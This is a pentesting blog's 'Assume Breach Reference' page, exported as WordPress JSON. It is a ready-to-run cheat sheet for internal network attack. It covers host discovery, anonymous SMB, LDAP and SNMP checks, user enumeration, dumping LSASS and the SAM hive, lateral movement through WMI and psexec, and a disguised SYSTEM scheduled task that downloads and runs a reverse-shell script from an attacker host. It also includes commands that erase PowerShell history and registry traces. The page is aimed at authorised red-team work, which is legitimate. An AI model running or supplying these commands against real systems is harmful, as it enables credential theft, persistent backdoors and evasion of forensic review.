{"id":725,"date":"2025-05-17T18:22:26","date_gmt":"2025-05-17T18:22:26","guid":{"rendered":"https:\/\/sirensecurity.io\/blog\/?page_id=725"},"modified":"2025-05-19T20:15:59","modified_gmt":"2025-05-19T20:15:59","slug":"assume-breach-reference","status":"publish","type":"page","link":"https:\/\/sirensecurity.io\/blog\/assume-breach-reference\/","title":{"rendered":"Assume Breach Reference"},"content":{"rendered":"\n<div class=\"wp-block-cover aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"1456\" height=\"816\" class=\"wp-block-cover__image-background wp-image-729 size-full\" alt=\"\" src=\"https:\/\/sirensecurity.io\/blog\/wp-content\/uploads\/2025\/05\/assume-breach-1.png\" data-object-fit=\"cover\"\/><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\" style=\"background-color:#5d8075\"><\/span><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-text-align-center has-large-font-size\">Assume Breach<\/p>\n\n\n\n<p class=\"has-white-color has-text-color has-link-color has-medium-font-size wp-elements-c122690bf6cb955678aa22627c8dd9aa\"><br><br><br><em>Perimeter is a myth. <\/em><br><br><mark data-darkreader-inline-bgcolor=\"\" style=\"background-color: rgba(0, 0, 0, 0); --darkreader-inline-bgcolor: var(--darkreader-background-00000000, rgba(0, 0, 0, 0));\" class=\"has-inline-color has-vivid-red-color\">-S1REN<\/mark><\/p>\n<\/div><\/div>\n\n\n\n<p id=\"assume-breach-reference\">Doing an internal and need an assume breach reference? 
This is your guide.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># <strong><em>ASSUME BREACH REFERENCE<\/em><\/strong>\n############################################\n# 1  <strong>NETWORK DISCOVERY<\/strong>                     #\n############################################\n<strong># PING SWEEP?<\/strong>  (edit subnet)               \nnmap -sn 10.0.0.0\/24 -oG ping_sweep\n\n<strong># EXTRACT LIVE IPS?<\/strong> (\u2192 online)\n<strong>#NOTE:<\/strong> Not ALL of these will always be real online machines. Some will be bogus ICMP returns...it just happens sometimes. Gather the local domain from the internal and grep for that in addition to any returned MAC Addresses. Basically, this is a situational thing when getting your actual \"<strong>online<\/strong>\" flat-file. \n<strong>In bash terms:<\/strong> |grep -iE 'mac|&lt;domain>.local' -B2 |grep -oE '((1?&#91;0-9]&#91;0-9]?|2&#91;0-4]&#91;0-9]|25&#91;0-5])\\.){3}(1?&#91;0-9]&#91;0-9]?|2&#91;0-4]&#91;0-9]|25&#91;0-5])' |sort -u > <strong>online<\/strong>\n<strong>In basic terms:<\/strong>            \ncat ping_sweep |grep -oE '((1?&#91;0-9]&#91;0-9]?|2&#91;0-4]&#91;0-9]|25&#91;0-5])\\.){3}(1?&#91;0-9]&#91;0-9]?|2&#91;0-4]&#91;0-9]|25&#91;0-5])' | sort -u > <strong>online<\/strong>\n\n<strong># TOP\u2011100 PORT SCAN?     <\/strong>                  \nfor ip in $(cat <strong>online<\/strong>); do nmap -sS -Pn --top-ports 100 -oA \"quick_$ip\" \"$ip\"; done\n\n<strong># FULL TCP (optional)? <\/strong>                    \nsudo nmap -sS -p- -T4 -iL <strong>online <\/strong>-oA full_scan\n\n############################################\n# 1A  <strong>NULL \/ ANON AUTH CHECKS <\/strong>             #\n############################################\n<strong># SMB NULL SESSION? <\/strong> (\u2192 smb_null.txt)      \nfor ip in $(cat <strong>online<\/strong>); do smbclient -L \"\/\/$ip\/\" -N -g >\/dev\/null 2>&amp;1 &amp;&amp; echo $ip; done | tee smb_null.txt\n\n<strong># RPC NULL INFO? 
<\/strong> (\u2192 rpc_null.txt)         \nfor ip in $(cat <strong>online<\/strong>); do rpcclient -U \"\" -N \"$ip\" -c info 2>&amp;1 | grep -q 'Domain' &amp;&amp; echo $ip; done | tee rpc_null.txt\n\n<strong># LDAP ANON BIND?<\/strong>  (\u2192 ldap_anon.txt)       \nfor ip in $(cat <strong>online<\/strong>); do ldapsearch -x -H \"ldap:\/\/$ip\" -s base -b \"\" -o nettimeout=3 \"(objectclass=*)\" 2>\/dev\/null | head -n1 | grep -q \"namingContexts\" &amp;&amp; echo $ip; done | tee ldap_anon.txt\n\n<strong># NFS EXPORTS?<\/strong>  (\u2192 nfs_exports.txt)        \nfor ip in $(cat <strong>online<\/strong>); do showmount -e \"$ip\" 2>\/dev\/null | grep -q \"export list\" &amp;&amp; echo $ip; done | tee nfs_exports.txt\n\n<strong># SNMP PUBLIC STRING?<\/strong>  (\u2192 snmp_public.txt) \nfor ip in $(cat <strong>online<\/strong>); do snmpwalk -v2c -c public -t1 -r0 \"$ip\" 1.3.6.1.2.1.1.1.0 2>\/dev\/null | grep -q \"DESCRIPTION\" &amp;&amp; echo $ip; done | tee snmp_public.txt\n\n<strong># FTP ANON LOGIN?<\/strong>  (\u2192 ftp_anon.txt)        \nfor ip in $(cat <strong>online<\/strong>); do nmap -p21 --script ftp-anon -Pn \"$ip\" 2>\/dev\/null | grep -q \"Anonymous FTP login allowed\" &amp;&amp; echo $ip; done | tee ftp_anon.txt\n\n############################################\n# 1B  <strong>NETEXEC &amp; KERBRUTE ENUM<\/strong>              #\n############################################\n# <strong>NETEXEC SMB SHARE ENUM?<\/strong>  (\u2192 ne_smb.txt)\nnetexec smb <strong>online <\/strong>-u '' -p '' --shares | tee ne_smb.txt\n\n# <strong>NETEXEC SMB GUEST ENUM?<\/strong> (\u2192 ne_smb_guest.txt)\nnetexec smb <strong>online <\/strong>-u \"guest\" -p \"\" --shares |tee ne_smb_guest.txt\n\n# <strong>NETEXEC LDAP ENUM?<\/strong>  (\u2192 ne_ldap.txt)      \nnetexec ldap <strong>online <\/strong>-u '' -p '' -M enum |tee ne_ldap.txt\n\n# <strong>NETEXEC WINRM ENUM?<\/strong> (\u2192 ne_winrm.txt)     \nnetexec winrm <strong>online <\/strong>-u '' -p '' --exec whoami 
|tee ne_winrm.txt\n\n# <strong>NETEXEC MSSQL INFO?<\/strong> (\u2192 ne_mssql.txt)     \nnetexec mssql <strong>online <\/strong>-u '' -p '' |tee ne_mssql.txt\n\n# <strong>KERBRUTE USER ENUM?<\/strong> (\u2192 kerbrute_valid.txt)\nkerbrute userenum --dc &lt;dc_ip> -d &lt;domain> users.txt 2>\/dev\/null |tee kerbrute_valid.txt\n\n############################################\n# 2  <strong>CREDENTIAL DUMPING<\/strong>                    #\n############################################\n# <strong>LSASS MINIDUMP?<\/strong>                           \nrundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll,MiniDump $(pidof lsass.exe) lsass.dmp full\n\n# <strong>SAM+SYSTEM HIVES?<\/strong>                         \nreg save HKLM\\SAM sam.save &amp; reg save HKLM\\SYSTEM system.save\n\n# <strong>PARSE SECRETS?<\/strong>                            \nsecretsdump.py -sam sam.save -system system.save LOCAL > hashed.txt\n\n############################################\n# 3  <strong>LATERAL MOVEMENT<\/strong>                      #\n############################################\n# <strong>PS REMOTING?<\/strong>                              \nEnter-PSSession -ComputerName &lt;host> -Credential &lt;dom\\\\user>\n\n# <strong>WMI EXEC?<\/strong>                                 \nwmic \/node:&lt;host> process call create \"cmd \/c powershell -c &lt;payload>\"\n\n# <strong>SMB PSEXEC?<\/strong>                               \npsexec.py &lt;dom>\/&lt;user>:&lt;pass>@&lt;host>\n\n############################################\n# 4  <strong>PERSISTENCE<\/strong>                           #\n############################################\n# <strong>SYSTEM SCHEDULED TASK?<\/strong>                    \nschtasks \/create \/ru SYSTEM \/sc ONSTART \/tn WinUpdate \/tr \"powershell -ep bypass -c iex((New-Object Net.WebClient).DownloadString('http:\/\/&lt;ip>\/rev.ps1'))\"\n\n# <strong>WMI EVENT SUB BACKDOOR?<\/strong>                   \npowershell -c \"Invoke-WmiMethod -Namespace root\\subscription 
...\"\n\n############################################\n# 5  <strong>CLEAN-UP \/ COVER TRACKS<\/strong>               #\n############################################\n# <strong>CLEAR POWERSHELL HISTORY?<\/strong>                 \nRemove-Item (Get-PSReadlineOption).HistorySavePath\n\n# <strong>CLEAR CMD RUNMRU?<\/strong>                         \nreg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU \/f\n########################################################\n<em>Happy Hacking, Intruder.<\/em>\n-S1REN\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Doing an internal and need an assume breach reference? 
This is your guide.<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-725","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/725","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/comments?post=725"}],"version-history":[{"count":13,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/725\/revisions"}],"predecessor-version":[{"id":762,"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/pages\/725\/revisions\/762"}],"wp:attachment":[{"href":"https:\/\/sirensecurity.io\/blog\/wp-json\/wp\/v2\/media?parent=725"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}